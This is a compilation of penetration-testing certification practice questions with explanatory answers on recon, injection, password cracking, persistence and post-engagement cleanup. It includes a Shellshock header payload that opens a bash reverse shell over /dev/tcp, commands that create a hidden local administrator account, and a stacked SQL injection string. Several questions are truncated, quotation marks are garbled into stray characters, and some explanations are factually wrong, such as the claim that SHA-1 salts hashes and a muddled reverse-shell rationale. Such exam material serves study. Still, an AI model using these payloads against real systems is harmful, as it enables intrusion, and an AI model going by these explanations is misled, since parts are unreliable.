Important concepts from Practice Exams
A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig :...;; ANSWER SECTIONcomptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org. 3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.Which of the following potential issues can the penetration tester identify based on th
"MX comptia.org-mail.protection.outlook.com" is a Microsoft email server, not a CompTIA server. It is out of scope and should not be tested. Going with A.
A penetration tester has prepared the following phishing email for an upcoming penetration test: "Coworkers, A security incident recently occured on company property. All employees are required to abide by company policies at all times. To ensure maximum compliance, all empyees are required to sign the security policy acceptance form (on-line here) before the end of this month." Which of the following is the penetration tester using MOST to influence phishing targets to click on the link? A. Familiarity and likeness B. Authority and urgency C. Scarcity and fear D. Social proof and greed
"before the end of the month" - urgency "Human Resources" - Authority
During testing, you were able to obtain a remote shell on company ABC MS Windows 2012 server with the privileges of the "abc" user. In order to check what privileges the account has, you decide to upload the Sysinternals command AccessChk.exe ono the server and verify privileges What is the correct option to search all services and show only objects that have write access? C:\Users\ABC\accesschk.exe _____ "ABC" -cv -uv -an -cw -uc
-cw looks for permissions for given windows service and returns objects that have write access (correct) -cv looks for permissions for the given Windows service with verbosity -uv provides command verbosity and suppresses errors -an searches for rights assigned user account and looks for objects that have no access -uc looks for permissions for given windows service and suppresses errors
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools? A. Dictionary B. Directory C. Symlink D. Catalog E. For-loop
A dictionary is a data structure that stores a collection of items, each consisting of a key and a value. In the context of penetration testing, a dictionary can be used to store a list of commonly used words or phrases (i.e. a "wordlist") that can be fed as input into various scripts or programs, such as a brute-force password cracking tool. The key in this case would be the word or phrase, and the value could be a corresponding description or additional information. The other options listed (B. Directory, C. Symlink, D. Catalog, E. For-loop) are not typically used to store alphanumeric data in this manner.
A penetration tester runs the unshadow command on a machine.Which of the following tools will the tester most likely use NEXT? A. John the Ripper B. Hydra C. Mimikatz D. Cain and Abel
A. John the Ripper Explanation: The unshadow command is used to combine the /etc/passwd and /etc/shadow files on a Linux or Unix system, creating a single file that contains all of the user information, including password hashes. This file can then be used to crack the passwords using a password cracking tool such as John the Ripper. John the Ripper is a popular password cracking tool that uses a variety of methods to try and guess the password, including dictionary attacks, brute force attacks, and rule-based attacks. Once the tester has the unshadowed file, they will use John the Ripper to crack the password on the machine. B.Hydra, C. Mimikatz and D. Cain and Abel are also password cracking tools but they are not typically used after running the unshadow command.
A penetration tester wrote the following script to be used in one engagement #!/usr/bin/python import socket, sys ports = [21,22,23,25,80,139,443,445,3306,3389] if len (sys.argv) == 2; target = socket.gethostbyname(sys.argv[1]) else: print("too few arguments.") print("Synrax: python {} <>".format{sys.argv[0]}) sys.exit {} try: for port in ports ; s = socket.socket(socket.AP_INET, socket.SOCK_STREAM) s.settimeout(2) result = s.connect_ex{ (target,port) } if result == 0; print ("Port {} is opened".format {port}) except keyboardinterupt print("exiting...") sys.exit {} :Which of the following actions will this script perform? A. Look for open ports. B. Listen for a reverse shell. C. Attempt to flood open ports. D. Create an encrypted tunnel.
A. Look for open ports.
User credentials were captured from a database during an assessment and cracked using rainbow tables Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database? A. MD5 B. bcrypt C. SHA-1 D. PBKDF2
A. MD5 MD5 is the most likely algorithm that was used to store the passwords in the database, as it is an older and weaker algorithm that is easily cracked using rainbow tables. Bcrypt, SHA-1, and PBKDF2 are all stronger algorithms that would be more resistant to cracking attempts.
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database? A. MD5 B. bcrypt C. SHA-1 D. PBKDF2
A. MD5 Rainbow tables are precomputed tables that are used to quickly crack the password hash. They are particularly effective against unsalted password hashes that are created using weak hashing algorithms such as MD5, which can be cracked quickly. If the user credentials were captured from a database during an assessment and cracked using rainbow tables, it is likely that the passwords were stored in the database using the MD5 hashing algorithm. In contrast, bcrypt, SHA-1, and PBKDF2 are considered stronger algorithms that are more resistant to rainbow table attacks, as they use a technique called salting to add randomness to the password hash and make it more difficult to crack.
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports? A. OpenVAS B. Drozer C. Burp Suite D. OWASP ZAP
A. OpenVAS OpenVAS (Open Vulnerability Assessment System) is a free and open-source vulnerability scanner that can be used to identify vulnerabilities on a network or system. It can scan for known vulnerabilities on open ports and services, and can also check for specific vulnerabilities based on the version of the software running on the target system. Once vulnerabilities are identified, OpenVAS can also provide information about potential exploits that could be used to exploit those vulnerabilities. After identifying the open ports and services with Nmap, the next step is to check if there are any known vulnerabilities on those open ports, OpenVAS is a suitable tool to do that. Other tools such as Drozer and Burp Suite, can be used for testing the security of Android and web applications respectively, but they are not suitable for vulnerability scanning. OWASP ZAP is also a web application security scanner, it can be used to find vulnerabilities on web applications, but it's not suitable for vulnerability scanning on ports.
A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment.Which of the following would most likely produce useful information for additional testing? A. Public code repositories associated with a developer who previously worked for the target company B. Public code repositories associated with the target company's organization C. Private code repositories associated with the target company's organiza
A. Public code repositories associated with a developer who previously worked for the target company
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.Which of the following should the tester do NEXT? A. Reach out to the primary point of contact. Most Voted B. Try to take down the attackers. C. Call law enforcement officials immediately. D. Collect the proper evidence and add to the final report.
A. Reach out to the primary point of contact The tester should immediately reach out to the primary point of contact (often known as the incident response team) to inform them of the ongoing attack. This will allow the organization to take immediate action to mitigate the attack and prevent further damage. The primary point of contact would be responsible for coordinating the incident response, including notifying other stakeholders, such as legal department, IT department, and management, about the incident. It's important to note that trying to take down the attackers, even if it's a valid option, should be done by experts and not by a penetration tester, and it's the incident response team responsibility, not the tester's. Calling law enforcement officials immediately would be a good idea, but the primary point of contact should be informed first. Finally, collecting the proper evidence and adding it to the final report is crucial, as it can be used to identify the attackers and assist in any legal action that may be taken against them. However, the main priority should be to stop the ongoing attack.
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? A. SQLmap B. Nessus C. Nikto D. DirBuster
A. SQLmap would be the best automated tool to use next to try to identify a vulnerability in this URL, specifically an SQL injection vulnerability. SQLmap is an open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It can take a URL as input, such as the one provided in the question, and automatically test for SQL injection by injecting different payloads into the parameters of the URL, such as the "id" parameter in this case. B. Nessus is a vulnerability scanner that can identify vulnerabilities in a wide range of systems and applications, but it is not specific to web application vulnerabilities. C. Nikto is a web server scanner that can identify a wide range of vulnerabilities in web servers and web applications, it's also useful to identify misconfigurations, but it's not specific to SQL injection vulnerabilities. D. DirBuster is a tool that can be used to identify directories and files on web servers, it's not specific to web application vulnerabilities.
Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks? A. Scraping social media for personal details B. Registering domain names that are similar to the target company's C. Identifying technical contacts at the company D. Crawling the company's website for company information
A. Scraping social media for personal details Scraping social media for personal details would assist a penetration tester the most when evaluating the susceptibility of top-level executives to social engineering attacks. This is because it would allow the tester to gather information about the executive's interests, hobbies, family, etc. which could be used to launch a targeted attack. By gathering this information, the tester would be able to craft a more convincing and targeted attack that is more likely to be successful.
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk? A. Whether sensitive client data is publicly accessible Most Voted B. Whether the connection between the cloud and the client is secure C. Whether the client's employees are trained properly to use the platform D. Whether the cloud applications were developed using a secure SDLC
A. Whether sensitive client data is publicly accessible When assessing the security of hosted data in a cloud environment, the first thing that should be verified is whether sensitive client data is publicly accessible. This includes checking for any misconfigurations or vulnerabilities that could allow an unauthorized person to access the data. This could be accomplished by performing web application scans, network scans, and manual testing to check for any vulnerabilities that could allow for data exfiltration or unauthorized access. It's also important to check whether the connection between the cloud and the client is secure, whether the client's employees are trained properly to use the platform, and whether the cloud applications were developed using a secure SDLC, but verifying whether sensitive client data is publicly accessible should be the primary focus.
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.Which of the following are considered passive reconnaissance tools? (Choose two.) A. Wireshark Most Voted B. Nessus C. Retina D. Burp Suite E. Shodan Most Voted F. Nikto
A. Wireshark: Wireshark is a network protocol analyzer tool that allows you to capture and analyze network traffic in real-time. It can be used to troubleshoot network issues, identify network performance bottlenecks, and detect security threats. It is considered a passive reconnaissance tool because it only captures and analyzes network traffic without actively trying to exploit vulnerabilities. E. Shodan: Shodan is a search engine that specializes in finding Internet-connected devices. It can be used to discover servers, routers, cameras, and other devices that are connected to the Internet. It is considered a passive reconnaissance tool because it only searches for information that is publicly available on the Internet, without actively trying to exploit vulnerabilities.
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? A. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} B. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} C. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} D. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€ ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}
A. exploit = {User-Agent: () { ignored;};/bin/bash -i id;whoami, Accept: text/html,application/xhtml +xml,application/xml} The code in the script is creating a dictionary object called exploit which contains a key-value pair for the User-Agent and Accept headers. The value of the User-Agent key is a command that will execute a shell command to create a reverse shell and redirect its input and output to a specified IP and port. To determine the user context in which the server is being run, the tester should replace the command in the User-Agent value with 'id;whoami' which will execute a shell command to show the current user and group name of the process. Option B is trying to find all files with the SUID bit set, which is not related to determining the user context in which the server is being run. Option C is executing 'ps -ef' command which shows all running processes but not the user context. Option D is trying to connect to the same IP and port, which is not related to determining the user context in which the server is being run.
A penetration tester logs in as a user in the cloud environment of a company.Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? A. iam_enum_permissions B. iam_prive_sc_scan C. iam_backdoor_assume_role D. iam_bruteforce_permissions
A. iam_enum_permissions The Pacu tool is a framework for penetration testing AWS environments, it has several modules that can be used to perform various tasks. In this scenario, the tester wants to determine the level of access of an existing user in the cloud environment. The Pacu module that enables the tester to determine the level of access of the existing user is iam_enum_permissions. This module allows the tester to enumerate all the permissions and policies associated with the user. It can be used to check the permissions of the user and check what actions the user can perform within the environment. B. iam_prive_sc_scan and C. iam_backdoor_assume_role are modules that are not related to determining the level of access of an existing user. D. iam_bruteforce_permissions is a module that allows the tester to perform a brute-force attack on the permissions of an existing user, but it is not suitable to determine the level of access of the user.
A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user's work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test? A. Add a web shell to the root of the website. B. Upgrade the reverse shell to a true TTY termina
B, upgrading the reverse shell to a true TTY terminal, is the best choice from the available options. This option will allow the penetration tester to interact with the system in a more user-friendly way, without disrupting the work of the other user. Upgrading the reverse shell to a TTY terminal will create a new session that can be used independently of the user currently logged in as root. This option is less likely to be detected by system administrators, and does not involve making any permanent changes to the system.
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.Which of the following changes should the tester apply to make the script work as intended? 1. #!/usr/bin/perl 2. $ip-argv[1]; 3. if ($hostname eq "switchtest"} 4. ( attack (Sip); 5. } 6. else exit 0; } 7. sub attack [ A. Change line 2 to $ip= ג€10.192.168.254ג€; B. Remove lines 3, 5, and 6. C. Remove line 6. D. Move al
B. You're not going to find something called switchtest.
A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal? A. Wireshark B. Aircrack-ng C. Kismet D. Wifite
B. Aircrack-ng Aircrack-ng is a powerful suite of tools used for wireless penetration testing. It includes several utilities for capturing, monitoring, and analyzing Wi-Fi networks. One of the utilities in Aircrack-ng is "airbase-ng," which allows you to set up a rogue access point. With airbase-ng, you can create a fake access point with the same SSID as a legitimate one, tricking devices into connecting to it. By setting up a rogue access point, a penetration tester can perform various attacks, such as man-in-the-middle attacks, captive portal attacks, and credential harvesting. This helps the tester assess the security posture of the wireless network and identify potential vulnerabilities. Wifite (D) is a tool specifically designed for automated Wi-Fi penetration testing but is not primarily used for setting up rogue access points. It focuses on automating the process of capturing WPA/WPA2 handshake packets to crack Wi-Fi passwords.
During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform? A. Sniff and then crack the WPS PIN on an associated WiFi device. B. Dump the user address book on the device. C. Break a connection between two Bluetooth devices. D. Transmit text messages to the device.
B. Dump the user address book on the device Bluesnarfing is a type of attack that involves unauthorized access to a Bluetooth-enabled device. One example of a Bluesnarfing attack is when an attacker accesses a mobile device and downloads the user's address book without their permission. This can be done by using specialized software tools to connect to the device and extract the data stored on it. A. Sniff and then crack the WPS PIN on an associated WiFi device: This is not a Bluesnarfing attack, this is a WiFi-related attack known as WPS cracking attack C. Break a connection between two Bluetooth devices: This is not a Bluesnarfing attack, this is a Denial of Service (DoS) attack D. Transmit text messages to the device: This is not a Bluesnarfing attack, this is a Spoofing attack
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.Which of the following is most important for the penetration tester to define FIRST? A. Establish the format required by the client. B. Establish the threshold of risk to escalate to the client immediately. Most Voted C. Establish the method of potential false positives. D. Establish the preferred day of the week for reporting.
B. Establish the threshold of risk to escalate to the client immediately. The most important thing for the penetration tester to define first is the threshold of risk to escalate to the client immediately. The client has stated that it wants to fix any findings, except for critical issues, after the service is made public. Therefore, it's important for the penetration tester to establish with the client the level of risk that would warrant an immediate escalation, so that the client can take action to fix the issue before the service is made public. This will help to mitigate the impact of any potential vulnerabilities on the new service and its users. Establishing the format required by the client (Option A) and the method of potential false positives (Option C) are important as well, but it is secondary to the threshold of risk escalation. Establishing the preferred day of the week for reporting (Option D) is also important but it is not as critical as establishing the threshold of risk escalation.
A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted? A. SQL injection B. HTML injection C. Remote command injection D. DLL injection
A is the answer WAITFOR can be used in a type of SQL injection attack known as time delay SQL injection or blind SQL injection34. This attack works on the basis that true or false queries can be answered by the amount of time a request takes to complete. For example, an attacker can inject a WAITFOR command with a delay argument into an input field of a web application that uses SQL Server as its database. If the query returns true, then theweb application will pause for the specified period of time before responding; if the query returns false, then the web application will respond immediately. By observing the response time, the attacker can infer information about the database structure and data1. Based on this information, one possible answer to your question is A. SQL injection, because it is an attack that exploits a vulnerability in a web application that allows an attacker to execute arbitrary SQL commands on the database server.
Which of the following best describes why a client would hold a lessons-learned meeting with the penetration-testing team? A. To provide feedback on the report structure and recommend improvements B. To discuss the findings and dispute any false positives C. To determine any processes that failed to meet expectations during the assessment D. To ensure the penetration-testing team destroys all company data that was gathered during the test
A lessons-learned meeting is held between the client and the penetration-testing team after the assessment process to discuss the assessment process and its outcomes. The primary objective of this meeting is to identify areas of improvement for future assessments. Therefore, the correct answer is A. To provide feedback on the report structure and recommend improvements.
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully? A. windows/x64/meterpreter/reverse_tcp B. windows/x64/meterpreter/reverse_http C. windows/x6
A reverse tcp connection is usually used to bypass firewall restrictions on open ports. A firewall usually blocks incoming connections on open ports, but does not block outgoing traffic. windows/meterpreter/reverse_tcp allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, control the webcam and microphone, etc.
Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables? A. SOW B. SLA C. MSA D. NDA
A statement of work (SOW) is a document routinely employed in the field of project management. It is the narrative description of a project's work requirement. It defines project-specific activities, deliverables and timelines for a vendor providing services to the client.
A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack? A. Credential harvesting B. Privilege escalation C. Password spraying D. Domain record abuse
A. The penetration tester created a fake login page to trick the company's employees into entering their email credentials, which were then harvested by the tester. This type of attack is commonly referred to as phishing, and it is a common tactic used by attackers to gain access to sensitive information.
Which of the following assessment methods is MOST likely to cause harm to an ICS environment? A. Active scanning B. Ping sweep C. Protocol reversing D. Packet analysis
A. Active scanning is most likely to cause harm to an ICS (Industrial Control Systems) environment. Active scanning is a method of security assessment that involves actively sending packets to a target system to identify open ports, services, and vulnerabilities. This type of assessment can cause harm to an ICS environment as it may disrupt normal system operation and cause unintended consequences. Active scanning can cause system crashes, errors, or even cause physical damage to the devices that are being controlled. B. Ping sweep is a method of identifying active hosts on a network by sending ICMP echo request packets to a range of IP addresses. It is considered less harmful than active scanning as it only sends a single packet to a target system to identify if it is active, it doesn't involve sending multiple packets like active scanning. C. Protocol reversing: is the process of reversing the protocols of a system and analyzing the data coming in and out, it is not harmful as it only analyzes the data and doesn't generate any new packets. D. Packet analysis: is the process of capturing and analyzing network packets to identify patterns, errors, or security threats. It is not harmful as it only captures and analyzes existing packets.
Which of the following situations would MOST likely warrant revalidation of a previous security assessment? A. After detection of a breach B. After a merger or an acquisition C. When an organization updates its network firewall configurations D. When most of the vulnerabilities have been remediated
A. After detection of a breach is the most likely situation that would warrant revalidation of a previous security assessment. Detection of a security breach indicates that the current security measures in place have failed, and a revalidation of the previous security assessment would be necessary to identify any additional vulnerabilities and to ensure that the organization's security measures are adequate to prevent future breaches.
A penetration tester writes the following script: #!/bin/bash for x in 'seq 1 254'; do ping -c 1 10.10.1.$x; done Which of the following objectives is the tester attempting to achieve? A. Determine active hosts on the network. Most Voted B. Set the TTL of ping packets for stealth. C. Fill the ARP table of the networked devices. D. Scan the system on the most used ports.
A. Determine active hosts on the network. The script is using a loop that iterates through a range of IP addresses (10.10.1.1 to 10.10.1.254) and for each IP address, it sends a single ping packet (ping -c 1) to the IP address. The purpose of this script is to determine which IP addresses on the network are active by checking which IP addresses respond to the ping. This is a common method used to perform host discovery and identify active hosts on a network. The script is not attempting to set the TTL of ping packets for stealth (Option B), fill the ARP table of the networked devices (Option C), or scan the system on the most used ports (Option D).
A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task? A. GDB B. Burp Suite C. SearchSpliot D. Netcat
A. GDB GDB (GNU Debugger) is a debugging tool that can be used to find buffer overflow vulnerabilities in software programs. It is designed to help testers find weaknesses in code that could be used to exploit the program. GDB is the best tool for this particular task.
Which of the following is the MOST important information to have on a penetration testing report that is written for the developers? A. Executive summary B. Remediation C. Methodology D. Metrics and measures
B. Remediation When a penetration testing report is written for developers, the most important information to include is the remediation. This is because the purpose of a penetration test is to identify vulnerabilities and weaknesses in a system, and the ultimate goal is to have these issues fixed. Developers need to know how to fix the vulnerabilities that were found, and the remediation section of the report should provide them with clear, actionable steps that they can take to address the issues. The executive summary gives an overview of the report and the main findings, methodology is the process and tools used during the test, and metrics and measures are the quantifiable data that can be used to evaluate the results of the test. While all these sections are important, the remediation section is the most crucial for developers as they need to know how to fix the vulnerabilities.
A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following: IP Address: 192.168.1.63 - Physical Address: 60-36-dd-a6-c5-33 Which of the following commands would the penetration tester MOST likely use in order to est
B. arp -s 192.168.1.63 60-36-DD-A6-C5-33 This command creates a static ARP entry that associates the IP address 192.168.1.63 with the physical address 60-36-DD-A6-C5-33. This means that any traffic destined for 192.168.1.63 will be sent directly to the specified physical address, without the need for ARP resolution.
Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.) A. Use of non-optimized sort functions B. Poor input sanitization C. Null pointer dereferences D. Non-compliance with code style guide E. Use of deprecated Javadoc tags F. A cydomatic complexity score of 3
B. Poor input sanitization C. Null pointer dereferences An application security assessment report addressed to developers would most likely include information about poor input sanitization and null pointer dereferences. Poor input sanitization refers to the failure to properly validate or filter user input, which could leave the application vulnerable to attacks such as SQL injection or cross-site scripting. Null pointer dereferences occur when a program attempts to access memory that has not been allocated, which can cause the program to crash or allow an attacker to execute arbitrary code. Information such as use of non-optimized sort functions (A), non-compliance with code style guide (D), use of deprecated Javadoc tags (E) and a cyclomatic complexity score of 3 (F) are not considered security vulnerabilities and would not be included in a security report. These are more related to performance optimization, maintainability and code quality.
A penetration tester conducts an Nmap scan against a target and receives the following results: Port: state: service: Port 1080/tcp open socks Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target? A. Nessus B. ProxyChains C. OWASP ZAP D. Empire
B. ProxyChains ProxyChains is a tool that allows a user to redirect TCP connections through proxy servers. In this case, the tester can use ProxyChains to redirect their scanning tools through TCP port 1080 on the target, which is open and running the SOCKS service. This can be useful in situations where the target has restricted access to certain ports or where the tester wants to conceal their IP address. Nessus is a vulnerability scanner, OWASP ZAP is a web application scanner, Empire is a post-exploitation tool, they are not a proxy tool, therefore it wouldn't be the best choice here.
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement? A. grep -v apache ~/bash_history > ~/.bash_history B. rm -rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM ג€apacheג€ /F
B. rm -rf /tmp/apache From the code snippet it appears that the penetration tester has used a POST exploit to gain access to a system and executed a command that downloads a file named "apache" from the IP address 10.10.0.1, and then it runs it. The command also changes the permissions of the file to 777 which means it's giving full permissions to all users. After the engagement, the penetration tester should clean up the system and return it to its original state. One of the first steps should be to remove the "apache" file from the system using the command "rm -rf /tmp/apache" to remove the file and the folder recursively. Option A is not recommended because it's removing the apache line from the bash history, but it doesn't remove the file. Option C is not recommended because it's changing the permissions of the file, but it doesn't remove the file. Option D is not recommended because it's killing the process, but it doesn't remove the file.
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities? A. Clarify the statement of work B. Obtain an asset inventory from the client C. Interview all stakeholders D. Identify all third parties involved.
Based on similar questions on several resources, you need to clarify the statement of work
A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task? A. tcpdump B. Snort C. Nmap D. Netstat E. Fuzzer
C. Nmap Nmap (Network Mapper) is a widely used active reconnaissance tool that can be used to remotely identify the type of services that are running on a host. It can map the host's open ports and attempt to identify the service running on each port. Nmap can also be used to discover the operating system, device type and other information of the host. A. Tcpdump is a packet sniffer that captures and analyzes network traffic, it's not used for identifying the service running on a host. B. Snort is an intrusion detection system that analyzes network traffic, it's not used for identifying the service running on a host. D. Netstat is a command-line tool that displays network connections, routing tables, and interface statistics, it's not used for identifying the service running on a host. E. Fuzzer is a tool that is used to find security vulnerabilities by sending malformed or unexpected inputs to a program, it's not used for identifying the service running on a host.
A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take? A. Segment the firewall from the cloud. B. Scan the firewall for vulnerabilities. C. Notify the client about the firewall. D. Apply patches to the firewall.
C. Notify the client about the firewall. It is important for the tester to inform the client about the discovery of the firewall as soon as possible, so that the client can take appropriate actions to secure it. Segmenting the firewall from the cloud, scanning it for vulnerabilities, and applying patches are all actions that should be taken in consultation with the client, as they may have specific security or business requirements that need to be considered.
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester? A. NDA B. MSA C. SOW D. MOU
C. SOW (Statement of Work) A Statement of Work (SOW) is a document that defines the specific activities, deliverables, and schedules for a penetration tester. It outlines the scope of the assessment, including the systems and networks that will be tested, the methods that will be used, and the deliverables that will be provided, such as the final report. It also includes the schedule for the assessment, including the start and end dates, and any milestones that need to be met. A NDA (Non-Disclosure Agreement) is a legal document that prohibits the sharing of confidential information. A MSA (Master Service Agreement) is a legal document that sets the terms of service for a company or contractor, covering things like payment, dispute resolution, and termination. A MOU (Memorandum of Understanding) is a legal document that outlines the general terms of an agreement between two or more parties, but it does not include specific details of the services to be provided.
A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:1;SELECT Username, Password FROM Users;Which of the following injection attacks is the penetration tester using? A. Blind SQL B. Boolean SQL C. Stacked queries D. Error-based
C. Stacked queries notice the two semicolons ; stacked The string entered by the tester is an example of a stacked query, also known as a multiple query injection. It attempts to inject an additional SQL query into an existing one by stacking the new query on top of the original one. This can be used to extract sensitive information from the database, such as usernames and passwords. A blind SQL injection is when the attacker is able to send commands to the database but is unable to see the result of these commands, usually due to the lack of error messages. Boolean SQL injection is a type of SQL injection where the attacker will insert a payload that will cause a query to return true or false. Error-based SQL injection is a type of SQL injection where the attacker sends payloads that cause the database to return error messages.
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.Which of the following is the BEST action for the penetration tester to take? A. Utilize the tunnel as a means of pivoting to other internal devices. B. Disregard the IP range, as it is out of scope. C. Stop the assessment and inform the emergency contact. D. Scan the IP range for additional systems to exploit.
C. Stop the assessment and inform the emergency contact. The best action for the penetration tester to take after discovering the unknown IP range on the network device would be to stop the assessment and inform the emergency contact. The IP range belongs to a third-party supplier, which is likely out of scope for the assessment, and any unauthorized access or manipulation of their systems could have severe legal and financial implications. It would be inappropriate to utilize the tunnel as a means of pivoting to other internal devices, as it would be unauthorized access. Disregarding the IP range would be a violation of professional conduct, as well as a potential violation of laws. Scanning the IP range for additional systems to exploit would be unauthorized access and could lead to severe legal and financial consequences. It is important for penetration testers to follow strict guidelines and procedures when conducting assessments, and to always err on the side of caution when it comes to accessing systems that are out of scope.
A consulting company is completing the ROE during scoping.Which of the following should be included in the ROE? A. Cost of the assessment B. Report distribution C. Testing restrictions Most Voted D. Liability
C. Testing restrictions The scope of engagement (ROE) is a document that outlines the scope, objectives, and limitations of a penetration testing engagement. One of the most important aspect that should be included in the ROE is the testing restrictions, which is a list of specific systems, networks, or devices that are out-of-bounds for the testers. The cost of the assessment (Option A) should be agreed upon prior to the engagement, but it is not typically included in the ROE. The report distribution (Option B) should be agreed upon as well, but it is not typically included in the ROE. Liability (Option D) is an important aspect that should be considered, but it is typically handled in the contract rather than in the ROE.
A penetration tester has been given eight business hours to gain access to a client's financial system.Which of the following techniques will have the HIGHEST likelihood of success? A. Attempting to tailgate an employee who is going into the client's workplace B. Dropping a malicious USB key with the company's logo in the parking lot C. Using a brute-force attack against the external perimeter to gain a foothold D. Performing spear phishing against employees by posing as senior management
D. Performing spear phishing against employees by posing as senior management Performing spear phishing (Option D) against employees by posing as senior management is likely to have the highest likelihood of success because it targets the weakest link in any security system: the human element. People are often the weakest link in security and can be easily fooled by a well-crafted spear phishing email. Attempting to tailgate an employee (Option A) or dropping a malicious USB key (Option B) in the parking lot may be successful, but they will likely be less effective than a spear phishing attack. A brute-force attack (Option C) against the external perimeter to gain a foothold may also be possible but it is less likely to be successful within eight hours, and also it's a noisy method that will be easily detected.
A penetration tester ran the following commands on a Windows server: schtasks echo net user svsaccount password /add >> batchjob3.bat echo net localgroup Administrators svsaccount /add >> barchjob3.bat net user svsaccount runas /user:svsaccount mimikatz Which of the following should the tester do AFTER delivering the final report? A. Delete the scheduled batch job. B. Close the reverse shell connection. C. Downgrade the svsaccount permissions. D. Remove the tester-created credentials.
D. Remove the tester-created credentials. The tester has created a new user account (svsaccount) and set the password to "password", and then added the user account to the local Administrators group. The tester also ran mimikatz, which is a tool that allows the tester to obtain clear text password, hashes, and other sensitive information. After delivering the final report, the tester should remove the tester-created credentials by running the following command: "net user svsaccount /delete". This will remove the tester-created user account and its associated credentials. Deleting the scheduled batch job (Option A) is not necessary as the tester-created account has been removed. Closing the reverse shell connection (Option B) would be useful if the tester had created one, but it is not mentioned in the given information. Downgrading the svsaccount permissions (Option C) is not necessary as the account has been removed.
The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept? A. Statement of work B. Program scope C. Non-disclosure agreement D. Rules of engagement
D. Rules of engagement The concept that best identifies the defined parameters for the nature and types of exercises that can be conducted during a penetration test is "Rules of engagement" (ROE). Rules of engagement are guidelines and restrictions that outline the scope, goals, and limitations of the penetration test. They are agreed upon by both the penetration testing team and the organization or client receiving the test.
